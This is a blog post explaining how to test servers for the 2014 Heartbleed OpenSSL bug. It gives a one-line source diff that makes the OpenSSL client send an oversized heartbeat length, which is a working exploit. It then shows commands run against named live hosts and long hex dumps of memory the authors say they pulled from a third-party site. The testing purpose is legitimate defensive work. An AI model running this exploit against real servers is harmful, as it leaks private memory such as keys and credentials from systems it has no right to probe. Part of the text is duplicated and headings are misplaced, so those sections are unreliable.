The OpenSSL team released a new version[1] of OpenSSL to address a serious security issue that might leak sensitive data to anyone who is able to connect to your SSL services (if you are running OpenSSL version 1.0.1). The website http://heartbleed.com has a nice writeup of the consequences this bug might have. If you are looking for more technical in-depth content check out this blog post[2] or this archive message for the original commit of the OpenSSL code in question.
Contents
1 Patching OpenSSL
2 Testing
2.1 Testing a fixed host with non-patched OpenSSL client
2.2 Testing a fixed host with the patched OpenSSL client
2.3 Testing a vulnerable host with the patched OpenSSL client
3 References
4 See also
Patching OpenSSL
While patches for most distributions are already out, we found no instructions on how to test that the fixes are working once you have them installed. Of course you did restart your services after you installed the patches right?
The easiest way to test for the vulnerability is to use the OpenSSL command line client. It has all the functionality needed already build-in so adapting it to our needs is quite simple. Grab a copy of the previous OpenSSL version for example 1.0.1f.
Looking at the code in question we can see that the function tls1_heartbeat(SSL *s) is the one we are looking for. The heartbeat message constructed by OpenSSL looks as follows (comment taken from the OpenSSL code that is not our typo in the comment:
/* Create HeartBeat message, we just use a sequence number * as payload to distuingish different messages and add * some random stuff. * - Message Type, 1 byte * - Payload Length, 2 bytes (unsigned int) * - Payload, the sequence number (2 bytes uint) * - Payload, random bytes (16 bytes uint) * - Padding */
In order to trigger the bug we simply need to adjust the payload length to a bigger size. OpenSSL will happily comply and return some "memory junk" for us on systems that are not yet patched. The following one liner is all that needs to be changed to trigger the bug:
--- ssl/t1_lib.c.orig 2014-01-06 13:47:42.000000000 +0000 +++ ssl/t1_lib.c 2014-04-08 03:19:59.244054532 +0000 @@ -2669,5 +2669,6 @@ *p++ = TLS1_HB_REQUEST; /* Payload length (18 bytes here) */ - s2n(payload, p); + /* Feel free to bump up the size ... */ + s2n(1337, p); /* Sequence number */ s2n(s->tlsext_hb_seq, p);
Once that is done all you need to do is to compile your special version of OpenSSL. If you are unsure on how to compile OpenSSL on your own, simply stuff the patch into whatever package management your distribution/Operating System of choice is using.
Testing
Equipped with your custom OpenSSL client binary and a non-patched version you can test for the existence of the bug as follows. Start the OpenSSL client with the arguments listed below and once the connection to the remote machine was established press B. This will initiate a heartbeat to the remote SSL server.
Testing a fixed host with non-patched OpenSSL client
$ /usr/local/bin/openssl s_client -connect ipredator.se:443 -tlsextdebug -debug -state
Enter B
HEARTBEATING write to 0x801c17160 [0x801cbc003] (66 bytes => 66 (0x42)) 0000 - 18 03 03 00 3d 8f 6f 3c-52 11 83 20 9c a2 c0 49 ....=.o 5 (0x5)) 0000 - 18 03 03 00 3d ....= read from 0x801c17160 [0x801cb7008] (61 bytes => 61 (0x3D)) 0000 - 05 4d f5 c0 db 96 d1 f5-c7 07 e5 17 1f 3b 48 34 .M...........;H4 0010 - 6e 11 9d ba 10 0c 3a 34-eb 7b a5 7c c4 b6 c0 c0 n.....:4.{.|.... 0020 - b0 75 0e fe b7 fa 9e 04-e9 4e 4a 7d 51 d3 11 1f .u.......NJ}Q... 0030 - e2 23 16 77 cb a6 e1 8e-77 84 2b f8 7f .#.w....w.+.. read R BLOCK
You will get a heartbeat response that looks similar to this one.
Testing a fixed host with the patched OpenSSL client
$ /opt/openssl/bin/openssl s_client -connect ipredator.se:443 -tlsextdebug -debug -state
Enter B
HEARTBEATING write to 0x801818160 [0x8019d5803] (101 bytes => 101 (0x65)) 0000 - 18 03 03 00 60 9c a3 1e-fc 3b 3f 1f 0e 3a fe 4c ....`....;?..:.L 0010 - a9 33 08 cc 3d 43 54 75-44 7d 2c 7b f3 47 b9 56 .3..=CTuD},{.G.V 0020 - 89 37 c1 43 1c 80 7b 87-66 ff cb 55 5f 8d 1a 95 .7.C..{.f..U_... 0030 - 1b 4c 65 14 21 a1 95 ac-7a 70 79 fc cc a0 cf 51 .Le.!...zpy....Q 0040 - 0f 7e c5 56 14 c8 37 c1-40 0b b8 cb 43 96 8a e6 .~.V..7.@...C... 0050 - 21 42 64 58 62 15 fb 51-82 e6 7f ef 21 1b 6f 87 !BdXb..Q....!.o. 0060 - b9 c2 04 c8 47
The system does not respond to the heartbeat query anymore. OpenSSL can respond and terminate the session too. The behavior seems differ a bit between hosts.
Testing a vulnerable host with the patched OpenSSL client
So there are still quite a few targets to test out there. The SSL test from SSLLabs[3] is a good resource. We did not spend a lot of time on looking for a suitable candidate. Of course we checked http://heartbleed.com as well. Interestingly they are not using a valid certificate at all and to our surprise we could still pull data from some of cloudfront machines. The SSL config on the cloudfront machines is also not quite state of the art ... no PFS at all and RC4 all over the place. Details here. You can find dumps of the OpenSSL test here short version, long version.
$ /opt/openssl/bin/openssl s_client -connect heartbleed.com:443 -tlsextdebug -debug -state
Enter B
HEARTBEATING write to 0x801818160 [0x8019d5803] (101 bytes => 101 (0x65)) 0000 - 18 03 03 00 60 9c a3 1e-fc 3b 3f 1f 0e 3a fe 4c ....`....;?..:.L 0010 - a9 33 08 cc 3d 43 54 75-44 7d 2c 7b f3 47 b9 56 .3..=CTuD},{.G.V 0020 - 89 37 c1 43 1c 80 7b 87-66 ff cb 55 5f 8d 1a 95 .7.C..{.f..U_... 0030 - 1b 4c 65 14 21 a1 95 ac-7a 70 79 fc cc a0 cf 51 .Le.!...zpy....Q 0040 - 0f 7e c5 56 14 c8 37 c1-40 0b b8 cb 43 96 8a e6 .~.V..7.@...C... 0050 - 21 42 64 58 62 15 fb 51-82 e6 7f ef 21 1b 6f 87 !BdXb..Q....!.o. 0060 - b9 c2 04 c8 47 ....G
The system does not respond to the heartbeat query anymore. OpenSSL can respond and terminate the session too. The behavior seems differ a bit between hosts. Testing a vulnerable host with the patched OpenSSL client
So there are still quite a few targets to test out there. The SSL test from SSLLabs is a good resource. We did not spend a lot of time on looking for a suitable candidate. Of course we checked heartbleed.com as well. Interestingly they are not using a valid certificate at all and to our surprise we could still pull data from some of cloudfront machines. The SSL config on the cloudfront machines is also not quite state of the art ... no PFS at all and RC4 all over the place. Details here. You can find dumps of the OpenSSL test here short version, long version.
$ /opt/openssl/bin/openssl s_client -connect heartbleed.com:443 -tlsextdebug -debug -state
Enter B
HEARTBEATING write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A)) 0000 - 18 03 03 00 35 e1 79 2f-3e 25 85 88 4d d7 c8 d3 ....5.y/>%..M... 0010 - 82 6b f9 20 b3 bd 72 3c-1a 18 c6 16 ed 51 05 c7 .k. ..r<.....Q.. 0020 - 52 95 f4 2d af 88 4e df-e9 30 76 d6 67 1c 8f 2d R..-..N..0v.g..- 0030 - 3f 81 07 39 ee 4d c4 29-38 b5 ?..9.M.)8. read from 0x801818160 [0x8019d1003] (5 bytes => 5 (0x5)) 0000 - 18 03 03 05 5c ....\ read from 0x801818160 [0x8019d1008] (1372 bytes => 1372 (0x55C)) 0000 - ee 21 a3 bf 5d 5e 9f e1-43 6f ff 7f 08 d4 e8 21 .!..]^..Co.....! 0010 - 55 f8 c5 a6 41 3a 1a ea-58 5d 2f 3a 81 36 6d 15 U...A:..X]/:.6m. 0020 - 91 36 49 6d e9 77 2b 41-39 2f 65 f0 91 5c 90 db .6Im.w+A9/e..\.. 0030 - 80 8e 78 b6 50 f8 8e 48-fc ea 8a 44 8e 8b e0 77 ..x.P..H...D...w 0040 - a7 1f 1d f1 cb 67 09 d3-ef 15 8f 75 f1 dd a6 b4 .....g.....u.... 0050 - 4a 26 ec b9 66 b4 32 56-b5 59 a0 6a e9 67 d4 c6 J&..f.2V.Y.j.g.. 0060 - 00 f1 54 1d 05 ad a9 05-e8 ac ae 6c bf 2f c5 d6 ..T........l./.. 0070 - 6c 1a 56 9e 93 35 b1 d6-f2 bd d8 29 f1 77 64 28 l.V..5.....).wd( 0080 - e6 b5 e3 96 77 7d 55 d1-44 51 91 44 35 c9 3e 47 ....w}U.DQ.D5.>G 0090 - 86 0a 11 48 c9 5b 27 25-37 9d be 52 75 30 b2 f8 ...H.['%7..Ru0.. 00a0 - 5f 89 5c 5a 92 13 8d 1b-90 34 1c 83 db e5 83 39 _.\Z.....4.....9 00b0 - b6 62 32 32 59 88 bf 1b-13 7e 42 70 59 fa 12 cb .b22Y....~BpY... 00c0 - a0 cb 20 53 c3 d9 f7 8e-f8 eb c7 09 8d c9 ed b6 .. S............ 00d0 - 95 da 73 68 fe 2d 86 21-f1 07 31 56 33 b2 3b 9c ..sh.-.!..1V3.;. 00e0 - 18 15 33 07 5b 6b 4f 53-4d 58 1d a6 bd 88 28 14 ..3.[kOSMX....(. 00f0 - 29 9a 25 83 49 15 ea 4d-79 81 f7 60 ec 86 20 d4 ).%.I..My..`.. . 0100 - 44 31 7b 14 70 f1 c2 58-68 3e a6 35 76 da 1d f9 D1{.p..Xh>.5v... 0110 - 26 9b 79 2f ad 34 82 31-8f 7b 45 1a 4d e1 67 6c &.y/.4.1.{E.M.gl 0120 - 39 9d ef 39 58 9f e5 c1-70 02 c9 5d 04 ee 89 48 9..9X...p..]...H 0130 - 25 39 c7 29 11 d0 b6 a9-f0 82 c5 8e 87 5d ef c1 %9.).........].. 0140 - a1 5a 67 d4 dc b5 04 f8-e0 65 be 9f 10 81 dd 6e .Zg......e.....n 0150 - 43 4e 2c dc 44 64 f2 22-63 6d 0d 12 09 31 fb 38 CN,.Dd."cm...1.8 0160 - f5 22 21 68 6e 8a 5f 0e-50 4f 64 44 a9 2f 7e d9 ."!hn._.POdD./~. 0170 - 41 df f9 40 69 a4 ae 97-0e 68 41 79 44 45 a5 13 A..@i....hAyDE.. 0180 - b9 21 ad ce c9 89 6c 3e-6d d7 6c b8 ef 2c b3 24 .!....l>m.l..,.$ 0190 - a2 3b 8b 55 db 06 24 a1-06 80 cc 1b 48 61 53 73 .;.U..$.....HaSs 01a0 - 8f fc bb 43 c7 01 9e 3b-ba 91 d4 a2 24 37 4e 6d ...C...;....$7Nm 01b0 - 05 cd a1 34 76 58 91 8f-1e 3b 85 7f 34 a3 a1 04 ...4vX...;..4... 01c0 - 9d 06 2d aa c5 f2 09 98-de ea 56 12 b5 5e 51 7f ..-.......V..^Q. 01d0 - 30 df 47 22 c6 20 82 0c-a8 bf 37 67 f2 be f0 32 0.G". ....7g...2 01e0 - 28 39 34 f6 49 e5 ab 43-6e 60 6a 05 48 94 ca c8 (94.I..Cn`j.H... 01f0 - 4b 47 8f fe 10 57 13 75-60 83 f1 25 5c 70 ed c6 KG...W.u`..%\p.. 0200 - 28 ef a8 95 65 46 6e b0-db 5e d7 70 7b e2 38 23 (...eFn..^.p{.8# 0210 - d8 e6 3a 07 7d d5 5a b9-3a 40 6c 74 e7 e0 c1 31 ..:.}.Z.:@lt...1 0220 - 34 ce 22 1f 2f 5e 30 b6-20 60 42 dc 12 9b 52 d4 4."./^0. `B...R. 0230 - b4 db d9 ad 7b b2 42 ae-d2 f6 0d dd 88 b0 b8 03 ....{.B......... 0240 - b8 7d c0 49 e6 8d 45 72-21 dc b9 0d dd 43 8e 1b .}.I..Er!....C.. 0250 - f5 75 74 1b 94 2a d5 50-ae cd 60 a5 7d 24 4b df .ut..*.P..`.}$K. 0260 - 82 4d e8 3c c3 93 4b f6-cb f2 e8 13 ab f7 98 cf .M.<..K......... 0270 - 1a a4 10 62 8e be 4a 04-52 f8 23 8d d4 11 68 0a ...b..J.R.#...h. 0280 - 11 b8 79 93 43 91 00 3b-3b 65 3b f8 cd 12 9c f8 ..y.C..;;e;..... 0290 - 28 ed a3 e5 88 ee be 2d-df 5a ba bd a9 d2 93 4a (......-.Z.....J 02a0 - cc 04 49 9d 42 ea 1c 82-be 66 4c 16 8d 6a 04 b9 ..I.B....fL..j.. 02b0 - 37 04 e9 f5 0e b9 23 14-1c 44 c2 b8 f3 93 41 fd 7.....#..D....A. 02c0 - 66 df a4 ba ef 82 3b f8-6f bc 16 51 1c 3f 51 4c f.....;.o..Q.?QL 02d0 - 0c 75 88 c5 fb 16 a2 76-d8 ab d8 83 c1 1b e1 60 .u.....v.......` 02e0 - 12 7a bf 32 ea fd 18 85-45 38 35 56 f9 01 12 1d .z.2....E85V.... 02f0 - 3d ac 48 42 d6 54 84 ea-51 36 55 1e 4e 87 13 4b =.HB.T..Q6U.N..K 0300 - 85 cb c0 fb 89 a4 e9 2c-d8 76 04 52 f7 4b 8a 44 .......,.v.R.K.D 0310 - e9 ed 55 ba f9 9d 5f 3d-de 9e 08 ef ee 5c 0c cb ..U..._=.....\.. 0320 - 6f 81 db 67 40 78 9a 3c-db 15 3a 8a 48 3a 89 8a o..g@x.<..:.H:.. 0330 - f8 89 2a e2 96 77 09 22-b7 fc 5a 2a c7 52 f7 80 ..*..w."..Z*.R.. 0340 - 40 3b 53 0c b7 3c 73 06-cb 54 8e 02 31 3e c4 2d @;S...- 0350 - 9a 46 c9 bb 62 2a 71 16-8e 6d a2 bc 79 01 75 b6 .F..b*q..m..y.u. 0360 - f2 f2 1c b8 f1 05 e3 20-40 ae ff a4 30 c3 31 aa ....... @...0.1. 0370 - 63 32 c7 16 32 76 19 7c-30 2a 51 8f 3c b6 5e 28 c2..2v.|0*Q.<.^( 0380 - 77 be 3f a4 96 81 af 5d-78 cf 40 a1 72 97 19 d5 w.?....]x.@.r... 0390 - d0 10 fe 8f 64 f0 dd 20-3c ac 57 a0 f8 68 5c b3 ....d.. <.W..h\. 03a0 - 73 d7 12 93 73 23 a6 9e-dd ba c8 72 25 d4 1c a9 s...s#.....r%... 03b0 - 28 8d 75 c7 8a 84 3f e0-d4 aa 03 de 0c 08 83 1e (.u...?......... 03c0 - 51 a5 86 81 f7 3c f6 85-2e 2e f0 02 13 47 40 15 Q....<.......G@. 03d0 - 43 15 79 3d 9e 62 a4 f4-cc c0 d1 20 24 ea a2 7d C.y=.b..... $..} 03e0 - f1 91 2d 65 1c e4 90 91-e5 fe 88 c0 01 70 3b b6 ..-e.........p;. 03f0 - 44 90 c9 a2 fa d5 94 5a-d4 18 4d 7c e0 57 b3 6b D......Z..M|.W.k 0400 - 67 ea 75 a4 26 83 f5 12-54 40 0f 8c 55 9f 72 1f g.u.&...T@..U.r. 0410 - 06 0a 05 56 9d 85 d5 98-dd fa b8 4d a1 ac b4 b1 ...V.......M.... 0420 - 66 e7 25 2b 9e 28 8b f7-e6 9a cf 5c ac 81 cd e3 f.%+.(.....\.... 0430 - e7 47 d5 25 cd 66 e4 c4-e4 48 90 11 84 af 86 8c .G.%.f...H...... 0440 - e6 c3 7f 61 e7 06 da e3-05 b9 18 5b f4 2d 3a c5 ...a.......[.-:. 0450 - e8 b5 83 be 6a 37 97 8f-05 0f a6 cf 47 56 fb dd ....j7......GV.. 0460 - 75 91 12 84 0b af c8 39-7d 8f be 6c 95 39 b2 f4 u......9}..l.9.. 0470 - 53 50 38 4b 0a aa fa ae-44 fd b0 2e a0 02 65 c4 SP8K....D.....e. 0480 - c5 35 1b b1 e5 6b 25 ca-1b 07 db 77 ce 57 da 92 .5...k%....w.W.. 0490 - 41 1a 8c 00 b7 27 f9 21-38 3c 22 e4 86 ee 0c 45 A....'.!8<"....E 04a0 - 0b af c6 d1 ee 6c 16 9b-d5 be 0e dd 1d 4b 04 95 .....l.......K.. 04b0 - 93 9a 90 57 4f 5c ed 6b-17 2a ae 7e 6e f3 e5 a3 ...WO\.k.*.~n... 04c0 - 73 cb 81 d1 56 7a 31 54-2d 1a a7 8f 6a b3 1a 49 s...Vz1T-...j..I 04d0 - 4d 9c e6 89 af ea 74 9b-69 1d 07 01 ea 05 2c 6e M.....t.i.....,n 04e0 - e2 bb 6c e4 bb d2 bf 8a-2f 8d a5 84 63 be 83 51 ..l...../...c..Q 04f0 - ff 70 fa ed c5 5b 39 92-29 8e a5 3e ef 95 fe 7e .p...[9.)..>...~ 0500 - 49 91 83 de 37 0b 3d 9b-ea 1b e5 27 a5 4c 81 57 I...7.=....'.L.W 0510 - 5f 7b 8a 5a 27 e2 da ca-ac 42 84 6c 55 94 60 98 _{.Z'....B.lU.`. 0520 - 78 62 b3 f4 be 57 02 c5-2b d8 0f 83 d7 2f 5f 16 xb...W..+..../_. 0530 - b0 83 10 5f 6a 83 e4 87-dd 43 59 c8 fd db 05 63 ..._j....CY....c 0540 - ca c3 c7 08 86 a4 1b 8f-7d b2 8d 86 8e 22 98 9b ........}....".. 0550 - 0a 59 74 3d 24 9e 53 53-33 75 ba 7b .Yt=$.SS3u.{ read R BLOCK
References
↑ https://www.openssl.org/news/vulnerabilities.html#2014-0160
↑ http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
↑ https://www.ssllabs.com/ssltest/
0 comments:
Post a Comment